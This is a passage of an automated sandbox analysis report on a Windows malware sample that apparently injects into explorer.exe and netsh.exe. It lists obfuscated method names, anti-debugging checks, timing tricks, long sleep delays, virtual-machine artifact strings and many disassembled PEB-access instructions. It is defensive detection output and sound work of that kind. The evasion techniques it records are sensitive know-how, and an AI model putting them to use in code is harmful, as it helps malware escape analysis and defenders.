                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, TRDyijQaiyiZRTkxOq.csHigh entropy of concatenated method names: 'Dispose', 'TkXJ2q4hop', 'Dnh3IGPHGX', 'TI4QQOteaK', 'p7GJ1424W8', 'WRQJzhx3Co', 'ProcessDialogKey', 'tQw3Ox1Pfh', 'YWu3J3GVp1', 'kSa33njt1f'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, Gsdn3QgKGuj3ABI1L9.csHigh entropy of concatenated method names: 'DdPecURHqM', 'BsDeQkeXBS', 'EB3e0X8Q5X', 'jlqel3WmDx', 'ziXePyu7m4', 'TkM0N5vpQC', 'uGe0WgM04k', 'y0y0tgJJNM', 'AOk04Bolp2', 'KrE02Trj8H'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.csHigh entropy of concatenated method names: 'sXNycHJeF9', 'Tpdy7deA27', 'RLsyQ0M60C', 'RE0yMOdeDG', 'DE6y01QY5O', 'RpPyeEBPuI', 'fknyl4wsUS', 'E01yPoo7ag', 'xZIyvOmdra', 'w0tyhPv7y8'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, Qri0x7syuiRNrevCve.csHigh entropy of concatenated method names: 'J2aMxA0UM1', 'B6yMqDFdni', 'tpDM6tDVFl', 'mPSMshdccI', 'O34MAEKjqo', 'pQlMfKV6d4', 'AeHMborSHI', 'QrBMa4nAIt', 'dsbMi07RYD', 'xwLMHakJkF'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, tvOcrl3eIFMEK0gRcO.csHigh entropy of concatenated method names: 'abDj7cM5m', 'QdRxgAyi3', 'iLcqIiUb0', 'RTiZrfX2K', 'Qr6sxfsTp', 'cEoSXov0g', 'v8LZH9gJx5Gh7UvxH2', 'fxsGkOEmfZHALJnd6I', 'pXqNLXqPx37goTvdSS', 'JTPaPMS0i'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, rsRPv9JO8iJZ0C7ddKS.csHigh entropy of concatenated method names: 'aH3iogLVuU', 'HgjiUF1F2A', 'LuqijFmNcF', 'G6mixOE7A8', 'AeWiFvfy80', 'S8piqOQUeA', 'of2iZGnsqX', 'lkei6TIX6N', 'L1QisGbI1H', 'dGriSa8to2'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, vHjLiUmOYvJOUgmPGm.csHigh entropy of concatenated method names: 'GTnAGAiMDn', 'UmAARElWjW', 'm4NAm78BOR', 'rSUAuxnVQQ', 'XPLAIs8dFR', 'tb8ACN10DV', 'T7FATXVx5U', 'oGUAKObAGc', 'hixAn2YyXP', 'wyLA8C05xJ'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, jLW4CR6YqLFnTWAfMo.csHigh entropy of concatenated method names: 'rwqQmtdjy9', 'PUiQu6Ub38', 'sfdQLvdlAZ', 'VI7Q96X73F', 'kqMQNE0nGR', 'wOnQWByQFZ', 'L0gQtC2B6n', 'BkAQ4aW7D7', 'TqHQ2flayW', 'l0nQ1YQ7wv'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, nx1Pfh21Wu3GVp1PSa.csHigh entropy of concatenated method names: 'OiWagDlWZd', 'DD8aIfaMm5', 'wHFaCyPw2v', 'wUnaTk55yD', 'tTjamCRrNc', 'UDnaKlsyO6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe - Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 30B9904 second address: 30B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 30B9B7E second address: 30B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 4F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 7C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3135Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6805Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 9799Jump to behavior
                Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-13934
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI coverage: 1.6 %
                Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe TID: 3748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep count: 3135 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep time: -6270000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep count: 6805 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep time: -13610000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep count: 172 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep time: -344000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep count: 9799 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep time: -19598000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                Source: explorer.exe, 00000007.00000002.4444797028.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000007.00000003.3777482422.0000000009B72000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000007.00000002.4444797028.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: explorer.exe, 00000007.00000000.2010640411.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
                Source: explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000007.00000000.2009042834.000000000769A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\netsh.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_00409AB0 rdtsc | 6_2_00409AB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0040ACF0 LdrLoadDll | 6_2_0040ACF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EA118 mov ecx, dword ptr fs:[00000030h] | 6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EA118 mov eax, dword ptr fs:[00000030h] | 6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EA118 mov eax, dword ptr fs:[00000030h] | 6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EA118 mov eax, dword ptr fs:[00000030h] | 6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h] | 6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01170124 mov eax, dword ptr fs:[00000030h] | 6_2_01170124
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01200115 mov eax, dword ptr fs:[00000030h] | 6_2_01200115
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01146154 mov eax, dword ptr fs:[00000030h] | 6_2_01146154
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01146154 mov eax, dword ptr fs:[00000030h] | 6_2_01146154
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113C156 mov eax, dword ptr fs:[00000030h] | 6_2_0113C156
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D8158 mov eax, dword ptr fs:[00000030h] | 6_2_011D8158
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214164 mov eax, dword ptr fs:[00000030h] | 6_2_01214164
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214164 mov eax, dword ptr fs:[00000030h] | 6_2_01214164
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h] | 6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h] | 6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D4144 mov ecx, dword ptr fs:[00000030h] | 6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h] | 6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h] | 6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C019F mov eax, dword ptr fs:[00000030h] | 6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C019F mov eax, dword ptr fs:[00000030h] | 6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C019F mov eax, dword ptr fs:[00000030h] | 6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C019F mov eax, dword ptr fs:[00000030h] | 6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113A197 mov eax, dword ptr fs:[00000030h] | 6_2_0113A197
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113A197 mov eax, dword ptr fs:[00000030h] | 6_2_0113A197
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113A197 mov eax, dword ptr fs:[00000030h] | 6_2_0113A197
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011FC188 mov eax, dword ptr fs:[00000030h] | 6_2_011FC188
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011FC188 mov eax, dword ptr fs:[00000030h] | 6_2_011FC188
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01180185 mov eax, dword ptr fs:[00000030h] | 6_2_01180185
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E4180 mov eax, dword ptr fs:[00000030h] | 6_2_011E4180
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E4180 mov eax, dword ptr fs:[00000030h] | 6_2_011E4180
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_012161E5 mov eax, dword ptr fs:[00000030h] | 6_2_012161E5
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h] | 6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h] | 6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011BE1D0 mov ecx, dword ptr fs:[00000030h] | 6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h] | 6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h] | 6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_012061C3 mov eax, dword ptr fs:[00000030h] | 6_2_012061C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_012061C3 mov eax, dword ptr fs:[00000030h] | 6_2_012061C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011701F8 mov eax, dword ptr fs:[00000030h] | 6_2_011701F8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h] | 6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h] | 6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h] | 6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h] | 6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C4000 mov ecx, dword ptr fs:[00000030h] | 6_2_011C4000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h] | 6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D6030 mov eax, dword ptr fs:[00000030h] | 6_2_011D6030
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113A020 mov eax, dword ptr fs:[00000030h] | 6_2_0113A020
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113C020 mov eax, dword ptr fs:[00000030h] | 6_2_0113C020
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01142050 mov eax, dword ptr fs:[00000030h] | 6_2_01142050
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C6050 mov eax, dword ptr fs:[00000030h] | 6_2_011C6050
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116C073 mov eax, dword ptr fs:[00000030h] | 6_2_0116C073
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_012060B8 mov eax, dword ptr fs:[00000030h] | 6_2_012060B8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_012060B8 mov ecx, dword ptr fs:[00000030h] | 6_2_012060B8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114208A mov eax, dword ptr fs:[00000030h] | 6_2_0114208A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011380A0 mov eax, dword ptr fs:[00000030h] | 6_2_011380A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D80A8 mov eax, dword ptr fs:[00000030h] | 6_2_011D80A8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C20DE mov eax, dword ptr fs:[00000030h] | 6_2_011C20DE
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113C0F0 mov eax, dword ptr fs:[00000030h] | 6_2_0113C0F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011820F0 mov ecx, dword ptr fs:[00000030h] | 6_2_011820F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113A0E3 mov ecx, dword ptr fs:[00000030h] | 6_2_0113A0E3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C60E0 mov eax, dword ptr fs:[00000030h] | 6_2_011C60E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011480E9 mov eax, dword ptr fs:[00000030h] | 6_2_011480E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113C310 mov ecx, dword ptr fs:[00000030h] | 6_2_0113C310
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01218324 mov eax, dword ptr fs:[00000030h] | 6_2_01218324
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01218324 mov ecx, dword ptr fs:[00000030h] | 6_2_01218324
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01218324 mov eax, dword ptr fs:[00000030h] | 6_2_01218324
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01218324 mov eax, dword ptr fs:[00000030h] | 6_2_01218324
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01160310 mov ecx, dword ptr fs:[00000030h] | 6_2_01160310
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117A30B mov eax, dword ptr fs:[00000030h] | 6_2_0117A30B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117A30B mov eax, dword ptr fs:[00000030h] | 6_2_0117A30B
